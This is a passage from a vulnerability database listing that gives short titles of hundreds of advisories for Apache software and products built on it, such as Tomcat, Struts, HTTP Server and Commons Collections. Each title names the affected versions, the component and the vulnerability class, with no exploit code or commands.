9614| [94348] Apple macOS up to 10.12.1 apache_mod_php denial of service
9615| [94347] Apple macOS up to 10.12.1 apache_mod_php denial of service
9616| [94346] Apple macOS up to 10.12.1 apache_mod_php denial of service
9617| [94345] Apple macOS up to 10.12.1 apache_mod_php denial of service
9618| [94344] Apple macOS up to 10.12.1 apache_mod_php denial of service
9619| [94343] Apple macOS up to 10.12.1 apache_mod_php memory corruption
9620| [94342] Apple macOS up to 10.12.1 apache_mod_php memory corruption
9621| [94128] Apache Tomcat up to 9.0.0.M13 Error information disclosure
9622| [93958] Apache HTTP Server up to 2.4.23 mod_http2 h2_stream.c denial of service
9623| [93874] Apache Subversion up to 1.8.16/1.9.4 mod_dontdothat XXE denial of service
9624| [93855] Apache Hadoop up to 2.6.4/2.7.2 HDFS Service privilege escalation
9625| [93609] Apache OpenMeetings 3.1.0 RMI Registry privilege escalation
9626| [93555] Apache Tika 1.6-1.13 jmatio MATLAB File privilege escalation
9627| [93799] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
9628| [93798] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
9629| [93797] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 HTTP Split privilege escalation
9630| [93796] Apache Tomcat up to 8.5.6/9.0.0.M11 HTTP/2 Header Parser denial of service
9631| [93532] Apache Commons Collections Library Java privilege escalation
9632| [93210] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 ResourceLinkFactory privilege escalation
9633| [93209] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Realm Authentication User information disclosure
9634| [93208] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 System Property Replacement information disclosure
9635| [93207] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Utility Method privilege escalation
9636| [93206] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Configuration privilege escalation
9637| [93098] Apache Commons FileUpload privilege escalation
9638| [92987] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Commons Collection memory corruption
9639| [92986] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Tomcat memory corruption
9640| [92982] Oracle Insurance IStream 4.3.2 Apache Commons Collections memory corruption
9641| [92981] Oracle Financial Services Lending and Leasing 14.1.0/14.2.0 Apache Commons Collections memory corruption
9642| [92979] Oracle up to 8.0.3 Apache Commons Collections memory corruption
9643| [92977] Oracle FLEXCUBE Universal Banking up to 12.2.0 Apache Commons Collections memory corruption
9644| [92976] Oracle FLEXCUBE Universal Banking 12.87.1/12.87.2 Apache Commons Collections memory corruption
9645| [92975] Oracle FLEXCUBE Private Banking up to 12.1.0 Apache Commons Collections memory corruption
9646| [92974] Oracle FLEXCUBE Investor Servicing 12.0.1 Apache Commons Collections memory corruption
9647| [92973] Oracle 12.0.0/12.1.0 Apache Commons Collections memory corruption
9648| [92972] Oracle FLEXCUBE Core Banking 11.5.0.0.0/11.6.0.0.0 Apache Commons Collections memory corruption
9649| [92962] Oracle Agile PLM 9.3.4/9.3.5 Apache Commons Collections memory corruption
9650| [92909] Oracle Agile PLM 9.3.4/9.3.5 Apache Tomcat unknown vulnerability
9651| [92786] Oracle Banking Digital Experience 15.1 Apache Commons Collections information disclosure
9652| [92549] Apache Tomcat on Red Hat privilege escalation
9653| [92509] Apache Tomcat JK ISAPI Connector up to 1.2.41 jk_uri_worker_map.c memory corruption
9654| [92314] Apache MyFaces Trinidad up to 1.0.13/1.2.15/2.0.1/2.1.1 CoreResponseStateManager memory corruption
9655| [92313] Apache Struts2 up to 2.3.28/2.5.0 Action Name Cleanup cross site request forgery
9656| [92299] Apache Derby up to 10.12.1.0 SqlXmlUtil XML External Entity
9657| [92217] Apache ActiveMQ Artemis up to 1.3.x Broker/REST GetObject privilege escalation
9658| [92174] Apache Ranger up to 0.6.0 Policy cross site scripting
9659| [91831] Apache Jackrabbit up to 2.13.2 HTTP Header cross site request forgery
9660| [91825] Apache Zookeeper up to 3.4.8/3.5.2 C CLI Shell memory corruption
9661| [91818] Apache CXF Fediz up to 1.2.2/1.3.0 Application Plugin privilege escalation
9662| [92056] Apple macOS up to 10.11 apache_mod_php memory corruption
9663| [92055] Apple macOS up to 10.11 apache_mod_php memory corruption
9664| [92054] Apple macOS up to 10.11 apache_mod_php denial of service
9665| [92053] Apple macOS up to 10.11 apache_mod_php denial of service
9666| [92052] Apple macOS up to 10.11 apache_mod_php denial of service
9667| [92051] Apple macOS up to 10.11 apache_mod_php memory corruption
9668| [92050] Apple macOS up to 10.11 apache_mod_php denial of service
9669| [92049] Apple macOS up to 10.11 apache_mod_php memory corruption
9670| [92048] Apple macOS up to 10.11 apache_mod_php denial of service
9671| [92047] Apple macOS up to 10.11 apache_mod_php memory corruption
9672| [92046] Apple macOS up to 10.11 apache_mod_php memory corruption
9673| [92045] Apple macOS up to 10.11 apache_mod_php memory corruption
9674| [92044] Apple macOS up to 10.11 apache_mod_php memory corruption
9675| [92043] Apple macOS up to 10.11 apache_mod_php denial of service
9676| [92042] Apple macOS up to 10.11 apache_mod_php memory corruption
9677| [92041] Apple macOS up to 10.11 apache_mod_php memory corruption
9678| [92040] Apple macOS up to 10.11 Apache Proxy privilege escalation
9679| [91785] Apache Shiro up to 1.3.1 Servlet Filter privilege escalation
9680| [90879] Apache OpenMeetings up to 3.1.1 SWF Panel cross site scripting
9681| [90878] Apache Sentry up to 1.6.x Blacklist Filter reflect/reflect2/java_method privilege escalation
9682| [90610] Apache POI up to 3.13 XLSX2CSV Example OpenXML Document XML External Entity
9683| [90584] Apache ActiveMQ up to 5.11.3/5.12.2/5.13/1 Administration Web Console privilege escalation
9684| [90385] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site scripting
9685| [90384] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site request forgery
9686| [90383] Apache OpenOffice up to 4.1.2 Impress File memory corruption
9687| [89670] Apache Tomcat up to 8.5.4 CGI Servlet Environment Variable Open Redirect
9688| [89669] Apache HTTP Server up to 2.4.23 RFC 3875 Namespace Conflict Environment Variable Open Redirect
9689| [89726] Apple Mac OS X up to 10.11.5 apache_mod_php memory corruption
9690| [89484] Apache Qpid up to 0.13.0 on Windows Proton Library Certificate weak authentication
9691| [89473] HPE iMC PLAT/EAD/APM/iMC NTA/iMC BIMS/iMC UAM_TAM up to 7.2 Apache Commons Collections Library Command privilege escalation
9692| [90263] Apache Archiva Header denial of service
9693| [90262] Apache Archiva Deserialize privilege escalation
9694| [90261] Apache Archiva XML DTD Connection privilege escalation
9695| [88827] Apache Xerces-C++ up to 3.1.3 DTD Stack-Based memory corruption
9696| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
9697| [88608] Apache Struts up to 2.3.28.1/2.5.0 URLValidator Null Value denial of service
9698| [88607] Apache Struts up to 2.3.28.1 REST Plugin Expression privilege escalation
9699| [88606] Apache Struts up to 2.3.28.1 Restriction privilege escalation
9700| [88605] Apache Struts up to 2.3.28.1 Restriction privilege escalation
9701| [88604] Apache Struts up to 2.3.28.1 Token Validator cross site request forgery
9702| [88603] Apache Commons FileUpload up to 1.3.1 MultipartStream denial of service
9703| [88602] Apache Struts up to 1.3.10 ActionServlet.java cross site scripting
9704| [88601] Apache Struts up to 1.3.10 Multithreading ActionServlet.java memory corruption
9705| [88600] Apache Struts up to 1.3.10 MultiPageValidator privilege escalation
9706| [89005] Apache Qpid AMQP JMS Client getObject privilege escalation
9707| [87888] Apache Ranger up to 0.5.2 Policy Admin Tool eventTime sql injection
9708| [87835] Apache CloudStack up to 4.5.2.0/4.6.2.0/4.7.1.0/4.8.0.0 SAML-based Authentication privilege escalation
9709| [87806] HPE Discovery and Dependency Mapping Inventory up to 9.32 update 3 Apache Commons Collections Library privilege escalation
9710| [87805] HPE Universal CMDB up to 10.21 Apache Commons Collections Library privilege escalation
9711| [87768] Apache Shiro up to 1.2.4 Cipher Key privilege escalation
9712| [87765] Apache James Server 2.3.2 Command privilege escalation
9713| [88667] Apache HTTP Server up to 2.4.20 mod_http2 Certificate weak authentication
9714| [87718] Apache Struts up to 2.3.24.1 OGNL Caching denial of service
9715| [87717] Apache Struts up to 2.3.28 REST Plugin privilege escalation
9716| [87706] Apache Qpid Java up to 6.0.2 AMQP privilege escalation
9717| [87703] Apache Qbid Java up to 6.0.2 PlainSaslServer.java denial of service
9718| [87702] Apache ActiveMQ up to 5.13.x Fileserver Web Application Upload privilege escalation
9719| [87700] Apache PDFbox up to 1.8.11/2.0.0 XML Parser PDF Document XML External Entity
9720| [87679] HP Release Control 9.13/9.20/9.21 Apache Commons Collections Library Java Object privilege escalation
9721| [87540] Apache Ambari up to 2.2.0 File Browser View information disclosure
9722| [87433] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
9723| [87432] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
9724| [87431] Apple Mac OS X up to 10.11.4 apache_mod_php Format String
9725| [87430] Apple Mac OS X up to 10.11.4 apache_mod_php denial of service
9726| [87429] Apple Mac OS X up to 10.11.4 apache_mod_php information disclosure
9727| [87428] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
9728| [87427] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
9729| [87389] Apache Xerces C++ up to 3.1.3 XML Document DTDScanner.cpp memory corruption
9730| [87172] Adobe ColdFusion 11 Update 7/2016/up to 10 Update 18 Apache Commons Collections Library privilege escalation
9731| [87121] Apache Cordova iOS up to 3.x Plugin privilege escalation
9732| [87120] Apache Cordova iOS up to 3.x URL Whitelist privilege escalation
9733| [83806] HPE Network Node Manager i up to 10.01 Apache Commons Collections Library privilege escalation
9734| [83077] Apache Subversion up to 1.8.15/1.9.3 mod_authz_svn mod_authz_svn.c denial of service
9735| [83076] Apache Subversion up to 1.8.15/1.9.3 svnserve svnserve/cyrus_auth.c privilege escalation
9736| [82790] Apache Struts 2.0.0/2.3.24/2.3.28 Dynamic Method privilege escalation
9737| [82789] Apache Struts 2.0.0/2.3.24/2.3.28 XSLTResult privilege escalation
9738| [82725] HPE P9000 Command View up to 7.x/8.4.0 Apache Commons Collections Library privilege escalation
9739| [82444] Apache Camel up to 2.14.x/2.15.4/2.16.0 HTTP Request privilege escalation
9740| [82389] Apache Subversion up to 1.7.x/1.8.14/1.9.2 mod_dav_svn util.c memory corruption
9741| [82280] Apache Struts up to 1.7 JRE URLDecoder cross site scripting
9742| [82260] Apache OFBiz up to 12.04.05/13.07.02 Java Object privilege escalation
9743| [82259] Apache Qpid Proton up to 0.12.0 proton.reactor.Connector weak encryption
9744| [82250] Apache Ranger up to 0.5.0 Admin UI weak authentication
9745| [82214] Apache Wicket up to 1.5.14/6.21.x/7.1.x Input Element cross site scripting
9746| [82213] Apache Wicket up to 1.5.14/6.21.x/7.1.x ModalWindow Title getWindowOpenJavaScript cross site scripting
9747| [82212] Apache Ranger up to 0.5.0 Policy Admin Tool privilege escalation
9748| [82211] Apache OFBiz up to 12.04.06/13.07.02 ModelFormField.java DisplayEntityField.getDescription cross site scripting
9749| [82082] Apache JetSpeed up to 2.3.0 User Manager Service privilege escalation
9750| [82081] Apache OpenMeetings up to 3.1.0 SOAP API information disclosure
9751| [82080] Apache OpenMeetings up to 3.1.0 Event cross site scripting
9752| [82078] Apache OpenMeetings up to 3.1.0 Import/Export System Backup ZIP Archive directory traversal
9753| [82077] Apache OpenMeetings up to 3.1.0 Password Reset sendHashByUser privilege escalation
9754| [82076] Apache Ranger up to 0.5.1 privilege escalation
9755| [82075] Apache JetSpeed up to 2.3.0 Portal cross site scripting
9756| [82074] Apache JetSpeed up to 2.3.0 cross site scripting
9757| [82073] Apache JetSpeed up to 2.3.0 User Manager Service sql injection
9758| [82072] Apache JetSpeed up to 2.3.0 Portal Site Manager ZIP Archive directory traversal
9759| [82058] Apache LDAP Studio/Directory Studio up to 2.0.0-M9 CSV Export privilege escalation
9760| [82053] Apache Ranger up to 0.4.x Policy Admin Tool privilege escalation
9761| [82052] Apache Ranger up to 0.4.x Policy Admin Tool HTTP Request cross site scripting
9762| [81696] Apache ActiveMQ up to 5.13.1 HTTP Header privilege escalation
9763| [81695] Apache Xerces-C up to 3.1.2 internal/XMLReader.cpp memory corruption
9764| [81622] HPE Asset Manager 9.40/9.41/9.50 Apache Commons Collections Library Java Object privilege escalation
9765| [81406] HPE Service Manager up to 9.35 P3/9.41 P1 Apache Commons Collections Library Command privilege escalation
9766| [81405] HPE Operations Orchestration up to 10.50 Apache Commons Collections Library Command privilege escalation
9767| [81427] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
9768| [81426] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
9769| [81372] Apache Struts up to 2.3.24.1 I18NInterceptor cross site scripting
9770| [81371] Apache Struts up to 2.3.24.1 Double OGNL Evaluation privilege escalation
9771| [81370] Apache Struts up to 2.3.24.1 Java URLDecoder cross site scripting
9772| [81084] Apache Tomcat 6.0/7.0/8.0/9.0 ServletContext directory traversal
9773| [81083] Apache Tomcat 7.0/8.0/9.0 Index Page cross site request forgery
9774| [81082] Apache Tomcat 7.0/8.0/9.0 ResourceLinkFactory.setGlobalContext privilege escalation
9775| [81081] Apache Tomcat 6.0/7.0/8.0/9.0 Error information disclosure
9776| [81080] Apache Tomcat 6.0/7.0/8.0/9.0 Session Persistence privilege escalation
9777| [81079] Apache Tomcat 6.0/7.0/8.0/9.0 StatusManagerServlet information disclosure
9778| [81078] Apache Tomcat 7.0/8.0/9.0 Session privilege escalation
9779| [80970] Apache Solr up to 5.3.0 Admin UI plugins.js cross site scripting
9780| [80969] Apache Solr up to 5.2 Schema schema-browser.js cross site scripting
9781| [80968] Apache Solr up to 5.0 analysis.js cross site scripting
9782| [80940] HP Continuous Delivery Automation 1.30 Apache Commons Collections Library privilege escalation
9783| [80823] Apache CloudStack up to 4.5.1 KVM Virtual Machine Migration privilege escalation
9784| [80822] Apache CloudStack up to 4.5.1 API Call information disclosure
9785| [80778] Apache Camel up to 2.15.4/2.16.0 camel-xstream privilege escalation
9786| [80750] HPE Operations Manager 8.x/9.0 on Windows Apache Commons Collections Library privilege escalation
9787| [80724] Apache Hive up to 1.2.1 Authorization Framework privilege escalation
9788| [80577] Oracle Secure Global Desktop 4.63/4.71/5.2 Apache HTTP Server denial of service
9789| [80165] Intel McAfee ePolicy Orchestrator up to 4.6.9/5.0.3/5.3.1 Apache Commons Collections Library privilege escalation
9790| [80116] Apache Subversion up to 1.9.2 svn Protocol libsvn_ra_svn/marshal.c read_string memory corruption
9791| [80115] Apache ActiveMQ up to 5.12.x Broker Service privilege escalation
9792| [80036] IBM Cognos Business Intelligence Apache Commons Collections Library InvokerTransformer privilege escalation
9793| [79873] VMware vCenter Operations/vRealize Orchestrator Apache Commons Collections Library Serialized Java Object privilege escalation
9794| [79840] Apache Cordova File Transfer Plugin up to 1.2.x on Android unknown vulnerability
9795| [79839] Apache TomEE Serialized Java Stream EjbObjectInputStream privilege escalation
9796| [79791] Cisco Products Apache Commons Collections Library privilege escalation
9797| [79539] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
9798| [79538] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
9799| [79294] Apache Cordova-Android up to 3.6 BridgeSecret Random Generator weak encryption
9800| [79291] Apache Cordova-Android up to 4.0 Javascript Whitelist privilege escalation
9801| [79244] Apache CXF up to 2.7.17/3.0.7/3.1.2 SAML Web SSO Module SAML Response weak authentication
9802| [79243] Oracle WebLogic Server 10.3.6.0/12.1.2.0/12.1.3.0/12.2.1.0 WLS Security com.bea.core.apache.commons.collections.jar privilege escalation
9803| [78989] Apache Ambari up to 2.1.1 Open Redirect
9804| [78988] Apache Ambari up to 2.0.1/2.1.0 Password privilege escalation
9805| [78987] Apache Ambari up to 2.0.x cross site scripting
9806| [78986] Apache Ambari up to 2.0.x Proxy Endpoint api/v1/proxy privilege escalation
9807| [78780] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
9808| [78779] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
9809| [78778] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
9810| [78777] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
9811| [78776] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
9812| [78775] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
9813| [78774] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
9814| [78297] Apache Commons Components HttpClient up to 4.3.5 HTTPS Timeout denial of service
9815| [77406] Apache Flex BlazeDS AMF Message XML External Entity
9816| [77429] Apache ActiveMQ up to 5.10.0 LDAPLoginModule privilege escalation
9817| [77399] Apache ActiveMQ up to 5.10.0 LDAPLoginModule weak authentication
9818| [77375] Apache Tapestry up to 5.3.5 Client-Side Object Storage privilege escalation
9819| [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal
9820| [77299] Apache Solr Real-Time Module up to 7.x-1.1 Index Content information disclosure
9821| [77247] Apache ActiveMQ up to 5.10 TransportConnection.java processControlCommand denial of service
9822| [77083] Apache Groovy up to 2.4.3 MethodClosure.java MethodClosure memory corruption
9823| [76953] Apache Subversion 1.7.0/1.8.0/1.8.10 svn_repos_trace_node_locations information disclosure
9824| [76952] Apache Subversion 1.7.0/1.8.0/1.8.10 mod_authz_svn anonymous/authenticated information disclosure
9825| [76567] Apache Struts 2.3.20 unknown vulnerability
9826| [76733] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 ap_some_auth_required unknown vulnerability
9827| [76732] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 Request apr_brigade_flatten privilege escalation
9828| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
9829| [75690] Apache Camel up to 2.13.3/2.14.1 XPathBuilder.java XML External Entity
9830| [75689] Apache Camel up to 2.13.3/2.14.1 XML Converter Setup XmlConverter.java SAXSource privilege escalation
9831| [75668] Apache Sling API/Sling Servlets Post up to 2.2.1 HtmlResponse cross site scripting
9832| [75601] Apache Jackrabbit up to 2.10.0 WebDAV Request XML External Entity
9833| [75420] Apache Tomcat up to 6.0.43/7.0.58/8.0.16 Security Manager privilege escalation
9834| [75145] Apache OpenOffice up to 4.1.1 HWP Filter Crash denial of service
9835| [75032] Apache Tomcat Connectors up to 1.2.40 mod_jk privilege escalation
9836| [75135] PHP 5.4/5.5 HTTP Request sapi_apache2.c apache2handler privilege escalation
9837| [74793] Apache Tomcat File Upload denial of service
9838| [74708] Apple MacOS X up to 10.10.2 Apache denial of service
9839| [74707] Apple MacOS X up to 10.10.2 Apache denial of service
9840| [74706] Apple MacOS X up to 10.10.2 Apache memory corruption
9841| [74705] Apple MacOS X up to 10.10.2 Apache denial of service
9842| [74704] Apple MacOS X up to 10.10.2 Apache denial of service
9843| [74703] Apple MacOS X up to 10.10.2 Apache denial of service
9844| [74702] Apple MacOS X up to 10.10.2 Apache denial of service
9845| [74701] Apple MacOS X up to 10.10.2 Apache cross site request forgery
9846| [74700] Apple MacOS X up to 10.10.2 Apache unknown vulnerability
9847| [74661] Apache Flex up to 4.14.0 asdoc index.html cross site scripting
9848| [74609] Apache Cassandra up to 1.2.19/2.0.13/2.1.3 JMX/RMI Interface privilege escalation
9849| [74469] Apache Xerces-C up to 7.0 internal/XMLReader.cpp denial of service
9850| [74468] Apache Batik up to 1.6 denial of service
9851| [74414] Apache Mod-gnutls up to 0.5.1 Authentication spoofing
9852| [74371] Apache Standard Taglibs up to 1.2.0 memory corruption
9853| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
9854| [74174] Apache WSS4J up to 2.0.0 privilege escalation
9855| [74172] Apache ActiveMQ up to 5.5.0 Administration Console cross site scripting
9856| [69092] Apache Tomcat up to 6.0.42/7.0.54/8.0.8 HTTP Request Smuggling privilege escalation
9857| [73831] Apache Qpid up to 0.30 Access Restriction unknown vulnerability
9858| [73731] Apache XML Security unknown vulnerability
9859| [68660] Oracle BI Publisher 10.1.3.4.2/11.1.1.7 Apache Tomcat cross site scripting
9860| [73659] Apache CloudStack up to 4.3.0 Stack-Based unknown vulnerability
9861| [73593] Apache Traffic Server up to 5.1.0 denial of service
9862| [73511] Apache POI up to 3.10 Deadlock denial of service
9863| [73510] Apache Solr up to 4.3.0 cross site scripting
9864| [68447] Apache Subversion up to 1.7.18/1.8.10 mod_dav_svn Crash denial of service
9865| [68446] Apache Subversion up to 1.7.18/1.8.10 REPORT Request Crash denial of service
9866| [73173] Apache CloudStack Stack-Based unknown vulnerability
9867| [68357] Apache Struts up to 2.3.16.3 Random Number Generator cross site request forgery
9868| [73106] Apache Hadoop up to 2.4.0 Symlink privilege escalation
9869| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
9870| [72890] Apache Qpid 0.30 unknown vulnerability
9871| [72887] Apache Hive 0.13.0 File Permission privilege escalation
9872| [72878] Apache Cordova 3.5.0 cross site request forgery
9873| [72877] Apache Cordova 3.5.0 cross site request forgery
9874| [72876] Apache Cordova 3.5.0 cross site request forgery
9875| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
9876| [68065] Apache CXF up to 3.0.1 JAX-RS SAML denial of service
9877| [68064] Apache CXF up to 3.0.0 SAML Token denial of service
9878| [67913] Oracle Retail Markdown Optimization 12.0/13.0/13.1/13.2/13.4 Apache commons-beanutils-1.8.0.jar memory corruption
9879| [67912] Oracle Retail Invoice Matching up to 14.0 Apache commons-beanutils-1.8.0.jar memory corruption
9880| [67911] Oracle Retail Clearance Optimization Engine 13.3/13.4/14.0 Apache commons-beanutils-1.8.0.jar memory corruption
9881| [67910] Oracle Retail Allocation up to 13.2 Apache commons-beanutils-1.8.0.jar memory corruption
9882| [71835] Apache Shiro 1.0.0/1.1.0/1.2.0/1.2.1/1.2.2 unknown vulnerability
9883| [71633] Apachefriends XAMPP 1.8.1 cross site scripting
9884| [71629] Apache Axis2/C spoofing
9885| [67633] Apple Mac OS X up to 10.9.4 apache_mod_php ext/standard/dns.c dns_get_record memory corruption
9886| [67631] Apple Mac OS X up to 10.9.4 apache_mod_php Symlink memory corruption
9887| [67630] Apple Mac OS X up to 10.9.4 apache_mod_php cdf_read_property_info denial of service
9888| [67629] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_count_chain denial of service
9889| [67628] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_check_stream_offset denial of service
9890| [67627] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c mconvert memory corruption
9891| [67626] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c denial of service
9892| [67625] Apple Mac OS X up to 10.9.4 apache_mod_php Crash denial of service
9893| [67624] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_property_info denial of service
9894| [67623] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_unpack_summary_info denial of service
9895| [67622] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_short_sector denial of service
9896| [67620] Apple Mac OS X up to 10.9.4 apache_mod_php magic/Magdir/commands denial of service
9897| [67790] Apache HTTP Server mod_cache NULL Pointer Dereference denial of service
9898| [67522] Apache Tomcat up to 7.0.39 JSP Upload privilege escalation
9899| [70809] Apache POI up to 3.11 Crash denial of service
9900| [70808] Apache POI up to 3.10 unknown vulnerability
9901| [70806] Apache Commons-httpclient 4.2/4.2.1/4.2.2 spoofing
9902| [70749] Apache Axis up to 1.4 getCN spoofing
9903| [70701] Apache Traffic Server up to 3.3.5 denial of service
9904| [70700] Apache OFBiz up to 12.04.03 cross site scripting
9905| [67402] Apache OpenOffice 4.0.0/4.0.1/4.1.0 Calc privilege escalation
9906| [67401] Apache OpenOffice up to 4.1.0 OLE Object information disclosure
9907| [70661] Apache Subversion up to 1.6.17 denial of service
9908| [70660] Apache Subversion up to 1.6.17 spoofing
9909| [70659] Apache Subversion up to 1.6.17 spoofing
9910| [67183] Apache HTTP Server up to 2.4.9 mod_proxy denial of service
9911| [67180] Apache HTTP Server up to 2.4.9 WinNT MPM Memory Leak denial of service
9912| [67185] Apache HTTP Server up to 2.4.9 mod_status Heap-Based memory corruption
9913| [67184] Apache HTTP Server 2.4.5/2.4.6 mod_cache NULL Pointer Dereference denial of service
9914| [67182] Apache HTTP Server up to 2.4.9 mod_deflate Memory Consumption denial of service
9915| [67181] Apache HTTP Server up to 2.4.9 mod_cgid denial of service
9916| [70338] Apache Syncope up to 1.1.7 unknown vulnerability
9917| [70295] Apache CXF up to 2.7.9 Cleartext information disclosure
9918| [70106] Apache Open For Business Project up to 10.04.0 getServerError cross site scripting
9919| [70105] Apache MyFaces up to 2.1.5 JavaServer Faces directory traversal
9920| [69846] Apache HBase up to 0.94.8 information disclosure
9921| [69783] Apache CouchDB up to 1.2.0 memory corruption
9922| [13383] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 XML Parser privilege escalation
9923| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
9924| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
9925| [13164] Apache CXF up to 2.6.13/2.7.10 SOAP OutgoingChainInterceptor.java Invalid Content denial of service
9926| [13163] Apache CXF up to 2.6.13/2.7.10 SOAP HTML Content denial of service
9927| [13158] Apache Struts up to 2.3.16.2 ParametersInterceptor getClass privilege escalation
9928| [69515] Apache Struts up to 2.3.15.0 CookieInterceptor memory corruption
9929| [13086] Apache Struts up to 1.3.10 Class Loader privilege escalation
9930| [13067] Apache Struts up to 2.3.16.1 Class Loader privilege escalation
9931| [69431] Apache Archiva up to 1.3.6 cross site scripting
9932| [69385] Apache Syncope up to 1.1.6 unknown vulnerability
9933| [69338] Apache Xalan-Java up to 2.7.1 system-property unknown vulnerability
9934| [12742] Trustwave ModSecurity up to 2.7.5 Chunk Extension apache2/modsecurity.c modsecurity_tx_init privilege escalation
9935| [12741] Trustwave ModSecurity up to 2.7.6 Chunked HTTP Transfer apache2/modsecurity.c modsecurity_tx_init Trailing Header privilege escalation
9936| [13387] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Content-Length Header privilege escalation
9937| [13386] Apache Tomcat Security Manager up to 6.0.39/7.0.53/8.0.5 XSLT privilege escalation
9938| [13385] Apache Tomcat 8.0.0/8.0.1/8.0.3 AJP Request Zero Length denial of service
9939| [13384] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Chunked HTTP Request denial of service
9940| [12748] Apache CouchDB 1.5.0 UUIDS /_uuids denial of service
9941| [66739] Apache Camel up to 2.12.2 unknown vulnerability
9942| [66738] Apache Camel up to 2.12.2 unknown vulnerability
9943| [12667] Apache HTTP Server 2.4.7 mod_log_config.c log_cookie denial of service
9944| [66695] Apache CouchDB up to 1.2.0 cross site scripting
9945| [66694] Apache CouchDB up to 1.2.0 Partition partition2 directory traversal
9946| [66689] Apache HTTP Server up to 2.0.33 mod_dav dav_xml_get_cdata denial of service
9947| [12518] Apache Tomcat up to 6.0.38/7.0.49/8.0.0-RC9 HTTP Header denial of service
9948| [66498] Apache expressions up to 3.3.0 Whitelist unknown vulnerability
9949| [12781] Apache Struts up to 2.3.8 ParametersInterceptor getClass denial of service
9950| [12439] Apache Tomcat 6.0.33 XML XXE information disclosure
9951| [12438] Apache Tomcat 6.0.33/6.0.34/6.0.35/6.0.36/6.0.37 coyoteadapter.java disableURLRewriting privilege escalation
9952| [66356] Apache Wicket up to 6.8.0 information disclosure
9953| [12209] Apache Tomcat 7.0.0/7.0.50/8.0.0-RC1/8.0.1 Content-Type Header for Multi-Part Request Infinite Loop denial of service
9954| [66322] Apache ActiveMQ up to 5.8.0 cross site scripting
9955| [12291] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
9956| [66255] Apache Open For Business Project up to 10.04.3 cross site scripting
9957| [66200] Apache Hadoop up to 2.0.5 Security Feature information disclosure
9958| [66072] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
9959| [66068] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
9960| [11928] Oracle Secure Global Desktop up to 4.71 Apache Tomcat unknown vulnerability
9961| [11924] Oracle Secure Global Desktop up to 4.63 Apache Tomcat denial of service
9962| [11922] Oracle Secure Global Desktop up to 4.63 Apache Tomcat unknown vulnerability
9963| [66049] Apache XML Security for Java up to 1.4.6 Memory Consumption denial of service
9964| [12199] Apache Subversion up to 1.8.5 mod_dav_svn/repos.c get_resource denial of service
9965| [65946] askapache Firefox Adsense up to 3.0 askapache-firefox-adsense.php cross site request forgery
9966| [65668] Apache Solr 4.0.0 Updater denial of service
9967| [65665] Apache Solr up to 4.3.0 denial of service
9968| [65664] Apache Solr 3.6.0/3.6.1/3.6.2/4.0.0 Updater denial of service
9969| [65663] Apache Solr up to 4.5.1 ResourceLoader directory traversal
9970| [65658] Apache roller 4.0/4.0.1/5.0/5.0.1 unknown vulnerability
9971| [65657] Apache Roller 4.0/4.0.1/5.0/5.0.1 cross site scripting
9972| [11325] Apache Subversion 1.7.13 mod_dontdothat Bypass denial of service
9973| [11324] Apache Subversion up to 1.8.4 mod_dav_svn denial of service
9974| [11098] Apache Tomcat 5.5.25 HTTP Request cross site request forgery
9975| [65410] Apache Struts 2.3.15.3 cross site scripting
9976| [65386] Apache Solr up to 2.2.1 on TYPO3 cross site scripting
